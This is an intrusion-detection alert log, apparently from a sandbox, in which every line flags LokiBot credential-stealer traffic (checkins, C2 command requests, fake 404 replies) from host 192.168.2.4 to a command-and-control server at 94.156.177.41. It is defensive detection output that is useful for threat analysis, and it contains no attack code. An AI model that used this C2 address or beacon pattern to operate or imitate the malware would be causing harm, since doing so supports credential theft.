                                                                                                                              2024-11-20T10:58:09.796821+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45860094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.804164+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458600TCP
                                                                                                                              2024-11-20T10:58:09.959629+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45860694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.959629+01002025381ET MALWARE LokiBot Checkin1192.168.2.45860694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.959629+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45860694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:10.692365+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45860694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:10.692365+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45860694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:10.701298+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458606TCP
                                                                                                                              2024-11-20T10:58:10.847503+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45861394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:10.847503+01002025381ET MALWARE LokiBot Checkin1192.168.2.45861394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:10.847503+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45861394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:11.593143+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45861394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:11.593143+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45861394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:11.600677+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458613TCP
                                                                                                                              2024-11-20T10:58:11.824399+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45862394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:11.824399+01002025381ET MALWARE LokiBot Checkin1192.168.2.45862394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:11.824399+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45862394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:12.566744+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45862394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:12.566744+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45862394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:12.573029+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458623TCP
                                                                                                                              2024-11-20T10:58:12.724589+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45862994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:12.724589+01002025381ET MALWARE LokiBot Checkin1192.168.2.45862994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:12.724589+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45862994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:13.483556+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45862994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:13.483556+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45862994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:13.489483+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458629TCP
                                                                                                                              2024-11-20T10:58:13.658490+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45863594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:13.658490+01002025381ET MALWARE LokiBot Checkin1192.168.2.45863594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:13.658490+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45863594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:14.396851+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45863594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:14.396851+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45863594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:14.401721+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458635TCP
                                                                                                                              2024-11-20T10:58:14.545997+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45864194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:14.545997+01002025381ET MALWARE LokiBot Checkin1192.168.2.45864194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:14.545997+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45864194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:15.281301+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45864194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:15.281301+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45864194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:15.287376+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458641TCP
                                                                                                                              2024-11-20T10:58:15.460583+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45865094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:15.460583+01002025381ET MALWARE LokiBot Checkin1192.168.2.45865094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:15.460583+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45865094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:16.229259+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45865094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:16.229259+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45865094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:16.234194+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458650TCP
                                                                                                                              2024-11-20T10:58:16.391719+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45865794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:16.391719+01002025381ET MALWARE LokiBot Checkin1192.168.2.45865794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:16.391719+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45865794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:17.138537+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45865794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:17.138537+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45865794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:17.143458+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458657TCP
                                                                                                                              2024-11-20T10:58:17.293396+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45866494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:17.293396+01002025381ET MALWARE LokiBot Checkin1192.168.2.45866494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:17.293396+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45866494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.031801+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45866494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.031801+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45866494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.036772+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458664TCP
                                                                                                                              2024-11-20T10:58:18.186000+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45867094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.186000+01002025381ET MALWARE LokiBot Checkin1192.168.2.45867094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.186000+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45867094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.916385+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45867094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.916385+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45867094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:18.921296+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458670TCP
                                                                                                                              2024-11-20T10:58:19.112622+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45867594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:19.112622+01002025381ET MALWARE LokiBot Checkin1192.168.2.45867594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:19.112622+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45867594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:19.983626+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45867594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:19.983626+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45867594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:19.988578+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458675TCP
                                                                                                                              2024-11-20T10:58:20.136054+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45868394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:20.136054+01002025381ET MALWARE LokiBot Checkin1192.168.2.45868394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:20.136054+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45868394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:20.890029+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45868394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:20.890029+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45868394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:20.898961+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458683TCP
                                                                                                                              2024-11-20T10:58:21.045421+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45868894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.045421+01002025381ET MALWARE LokiBot Checkin1192.168.2.45868894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.045421+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45868894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.775558+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45868894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.775558+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45868894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.781334+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458688TCP
                                                                                                                              2024-11-20T10:58:21.935753+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45869594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.935753+01002025381ET MALWARE LokiBot Checkin1192.168.2.45869594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:21.935753+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45869594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:22.695646+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45869594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:22.695646+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45869594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:22.701370+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458695TCP
                                                                                                                              2024-11-20T10:58:22.855310+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45870194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:22.855310+01002025381ET MALWARE LokiBot Checkin1192.168.2.45870194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:22.855310+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45870194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:23.591646+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45870194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:23.591646+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45870194.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:23.598769+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458701TCP
                                                                                                                              2024-11-20T10:58:23.760310+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45870894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:23.760310+01002025381ET MALWARE LokiBot Checkin1192.168.2.45870894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:23.760310+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45870894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:24.491168+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45870894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:24.491168+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45870894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:24.496109+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458708TCP
                                                                                                                              2024-11-20T10:58:24.639781+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45871594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:24.639781+01002025381ET MALWARE LokiBot Checkin1192.168.2.45871594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:24.639781+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45871594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:25.390472+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45871594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:25.390472+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45871594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:25.395417+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458715TCP
                                                                                                                              2024-11-20T10:58:25.552646+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45872394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:25.552646+01002025381ET MALWARE LokiBot Checkin1192.168.2.45872394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:25.552646+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45872394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:26.277828+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45872394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:26.277828+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45872394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:26.284982+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458723TCP
                                                                                                                              2024-11-20T10:58:26.433858+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45873094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:26.433858+01002025381ET MALWARE LokiBot Checkin1192.168.2.45873094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:26.433858+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45873094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:27.285839+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45873094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:27.285839+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45873094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:27.290814+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458730TCP
                                                                                                                              2024-11-20T10:58:27.437349+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45873694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:27.437349+01002025381ET MALWARE LokiBot Checkin1192.168.2.45873694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:27.437349+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45873694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:28.175851+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45873694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:28.175851+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45873694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:28.184409+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458736TCP
                                                                                                                              2024-11-20T10:58:28.325967+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45874294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:28.325967+01002025381ET MALWARE LokiBot Checkin1192.168.2.45874294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:28.325967+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45874294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.063529+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45874294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.063529+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45874294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.071403+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458742TCP
                                                                                                                              2024-11-20T10:58:29.219984+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45875294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.219984+01002025381ET MALWARE LokiBot Checkin1192.168.2.45875294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.219984+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45875294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.952000+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45875294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.952000+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45875294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:29.956898+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458752TCP
                                                                                                                              2024-11-20T10:58:30.135328+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45875894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:30.135328+01002025381ET MALWARE LokiBot Checkin1192.168.2.45875894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:30.135328+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45875894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:30.880809+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45875894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:30.880809+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45875894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:30.885831+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458758TCP
                                                                                                                              2024-11-20T10:58:31.029059+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45876494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.029059+01002025381ET MALWARE LokiBot Checkin1192.168.2.45876494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.029059+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45876494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.753244+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45876494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.753244+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45876494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.758131+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458764TCP
                                                                                                                              2024-11-20T10:58:31.910533+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45877094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.910533+01002025381ET MALWARE LokiBot Checkin1192.168.2.45877094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:31.910533+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45877094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:32.772838+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45877094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:32.772838+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45877094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:32.777803+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458770TCP
                                                                                                                              2024-11-20T10:58:32.925547+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45877794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:32.925547+01002025381ET MALWARE LokiBot Checkin1192.168.2.45877794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:32.925547+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45877794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:33.662624+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45877794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:33.662624+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45877794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:33.672124+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458777TCP
                                                                                                                              2024-11-20T10:58:33.816974+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45878694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:33.816974+01002025381ET MALWARE LokiBot Checkin1192.168.2.45878694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:33.816974+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45878694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:34.541285+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45878694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:34.541285+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45878694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:34.546153+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458786TCP
                                                                                                                              2024-11-20T10:58:34.747068+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45879294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:34.747068+01002025381ET MALWARE LokiBot Checkin1192.168.2.45879294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:34.747068+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45879294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:35.492666+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45879294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:35.492666+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45879294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:35.497561+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458792TCP
                                                                                                                              2024-11-20T10:58:35.646259+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45879994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:35.646259+01002025381ET MALWARE LokiBot Checkin1192.168.2.45879994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:35.646259+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45879994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:36.384795+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45879994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:36.384795+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45879994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:36.389612+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458799TCP
                                                                                                                              2024-11-20T10:58:36.544139+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45880694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:36.544139+01002025381ET MALWARE LokiBot Checkin1192.168.2.45880694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:36.544139+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45880694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:37.276883+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45880694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:37.276883+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45880694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:37.281758+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458806TCP
                                                                                                                              2024-11-20T10:58:37.437340+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45881294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:37.437340+01002025381ET MALWARE LokiBot Checkin1192.168.2.45881294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:37.437340+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45881294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:38.177894+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45881294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:38.177894+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45881294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:38.186261+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458812TCP
                                                                                                                              2024-11-20T10:58:38.343067+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45881894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:38.343067+01002025381ET MALWARE LokiBot Checkin1192.168.2.45881894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:38.343067+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45881894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.075545+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45881894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.075545+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45881894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.080679+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458818TCP
                                                                                                                              2024-11-20T10:58:39.243872+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45882794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.243872+01002025381ET MALWARE LokiBot Checkin1192.168.2.45882794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.243872+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45882794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.980307+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45882794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.980307+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45882794.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:39.986192+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458827TCP
                                                                                                                              2024-11-20T10:58:40.146749+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45882894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:40.146749+01002025381ET MALWARE LokiBot Checkin1192.168.2.45882894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:40.146749+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45882894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:40.880124+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45882894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:40.880124+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45882894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:40.887054+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458828TCP
                                                                                                                              2024-11-20T10:58:41.034533+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45882994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.034533+01002025381ET MALWARE LokiBot Checkin1192.168.2.45882994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.034533+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45882994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.780911+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45882994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:41.780911+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45882994.156.177.4180TCP
